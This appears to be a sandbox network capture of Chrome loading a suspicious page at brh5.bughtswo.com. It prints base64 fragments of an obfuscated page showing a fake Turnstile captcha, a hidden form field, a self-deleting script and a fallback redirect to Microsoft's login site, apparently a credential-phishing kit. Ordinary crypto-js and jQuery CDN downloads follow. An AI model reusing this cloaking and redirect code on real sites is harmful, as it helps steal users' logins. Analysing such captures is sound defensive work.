                                                            2025-01-07 19:24:55 UTC1369INData Raw: 32 78 68 63 33 4d 39 49 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 46 70 62 6d 56 79 49 6a 34 4e 43 6a 78 6b 61 58 59 67 61 57 51 39 49 6d 6c 4f 54 6b 4a 79 53 31 56 7a 55 46 59 69 49 47 4e 73 59 58 4e 7a 50 53 4a 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 74 59 32 56 75 64 47 56 79 49 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 6a 34 4e 43 6a 78 6d 62 33 4a 74 49 47 6c 6b 50 53 4a 31 56 48 5a 33 52 6e 70 4a 65 45 46 76 49 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 4e 6d 58 33 52 31 63 6d 35 7a 64 47 6c 73 5a 53 49 67 61 57 51 39 49 6d 4e 6d 49 6a 34 38 4c 32 52 70 64 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b
                                                            Data Ascii: 2xhc3M9ImNhcHRjaGEtY29udGFpbmVyIj4NCjxkaXYgaWQ9ImlOTkJyS1VzUFYiIGNsYXNzPSJqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIj4NCjxmb3JtIGlkPSJ1VHZ3RnpJeEFvIj4NCjxkaXYgY2xhc3M9ImNmX3R1cm5zdGlsZSIgaWQ9ImNmIj48L2Rpdj4NCjxpbnB1dCB0eXBlPSJoaWRk
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 4e 31 59 6d 31 70 64 43 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 49 43 68 6c 64 6d 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 48 30 37 44 51 6f 67 49 43 41 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 32 56 30 52 57 78 6c 62 57 56 75 64 45 4a 35 53 57 51 6f 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 6b 75 64 6d 46 73 64 57 55 67 50 53 41 6e 55 6a 52 75 52 6c 51 34 4a 7a 73 4e 43 69 41 67 49 43 42 32 59 58 49 67 63 31 68 5a 63 30 35 73 61 30 74 47 53 69 41 39 49 43 49 75 4c 69 39 68 61 6c 52 6d 4d 30 46 44 4d 48 6c 4e 65 44 42 51 4d 7a 52 70 57 57 6c 50 65 6d 39 58 56 7a 63 34 54 57 64 6c 65 47 74 4e 59 54 52 55 65 46 5a 35 62
                                                            Data Ascii: N1Ym1pdCA9IGZ1bmN0aW9uIChldmVudCkgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIH07DQogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInBhZ2VsaW5rIikudmFsdWUgPSAnUjRuRlQ4JzsNCiAgICB2YXIgc1hZc05sa0tGSiA9ICIuLi9halRmM0FDMHlNeDBQMzRpWWlPem9XVzc4TWdleGtNYTRUeFZ5b
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 30 59 32 67 6f 5a 58 4a 79 62 33 49 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 78 76 5a 32 6c 75 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a 53 35 6a 62 32 30 6e 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 54 73 4e 43 6e 30 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 44 51 6f 38 4c 32 4a 76 5a 48 6b 2b 44 51 6f 4e 43 6a 77 76 61 48 52 74 62 44 34 3d 27 29 29 29 29 3b 0d 0a 76 61 72 20 4e 67 71 6c 77 4e 65 4f 6b 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 4e 67 71 6c 77 4e 65 4f 6b 79 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 4e 67
                                                            Data Ascii: 0Y2goZXJyb3IgPT4gew0KICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb20nKTsNCiAgICB9KTsNCn0NCjwvc2NyaXB0Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4='))));var NgqlwNeOky = document.currentScript;NgqlwNeOky.parentNode.removeChild(Ng
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 6a 62 47 39 31 5a 47 5a 73 59 58 4a 6c 4c 6d 4e 76 62 53 39 30 64 58 4a 75 63 33 52 70 62 47 55 76 64 6a 41 76 59 58 42 70 4c 6d 70 7a 50 33 4a 6c 62 6d 52 6c 63 6a 31 6c 65 48 42 73 61 57 4e 70 64 43 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 52 75 61 6e 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 76 59 57 70 68 65 43 39 73 61 57 4a 7a 4c 32 4e 79 65 58 42 30 62 79 31 71 63 79 38 30 4c 6a 45 75 4d 53 39 6a 63 6e 6c 77 64 47 38 74 61 6e 4d 75 62 57 6c 75 4c 6d 70 7a 49 6a 34 38 4c 33 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 6f 64 48 52 77 4c 57 56 78 64 57 6c 32 50 53 4a 59 4c 56 56 42 4c 55
                                                            Data Ascii: jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLU
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 4d 43 42 68 64 58 52 76 4f 33 64 70 5a 48 52 6f 4f 6a 4d 7a 4c 6a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4a 54 74 39 44 51 70 39 44 51 6f 6a 5a 6b 5a 6f 5a 6d 52 6d 55 45 56 73 63 69 41 75 5a 47 6c 7a 63 47 78 68 65 53 30 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 75 4d 6a 56 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 6d 52 6d 68 6d 5a 47 5a 51 52 57 78 79 49 43 35 74 64 43 30 79 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 77 4c 6a 56 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 6d 52 6d 68 6d 5a 47 5a 51 52 57 78 79 49 43 35 6f 4e 43 42 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 42 6a 59 57 78 6a 4b 43 34 35 4d 44 42 79 5a 57 30 67 4b 79 41 75 4d 33 5a 33 4b 54 74 39 44 51 6f
                                                            Data Ascii: MCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojZkZoZmRmUEVsciAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNmRmhmZGZQRWxyIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNmRmhmZGZQRWxyIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQo


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849722104.17.24.144435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:56 UTC959INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:56 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1143644
                                                            Expires: Sun, 28 Dec 2025 19:24:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CG152B4jD7NgS0gnArcsV2PJDURw09V9mkyfReOzt6rj%2BxZDJSboTKM4qgGwdD5Da2w7IKDPWwMYFFGFFeoK6GU5ZCccRmvlFPPqY1sssvONXQlrrzjJemN%2FG0RgdKw%2BhJsf34UI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654b37a7ef793-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:56 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                            Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                            Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                            Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                            Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                            Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                            Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                            Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                            Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                            Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849720151.101.194.1374435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:56 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Age: 1762422
                                                            Date: Tue, 07 Jan 2025 19:24:56 GMT
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740068-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 0
                                                            X-Timer: S1736277896.220204,VS0,VE1
                                                            Vary: Accept-Encoding
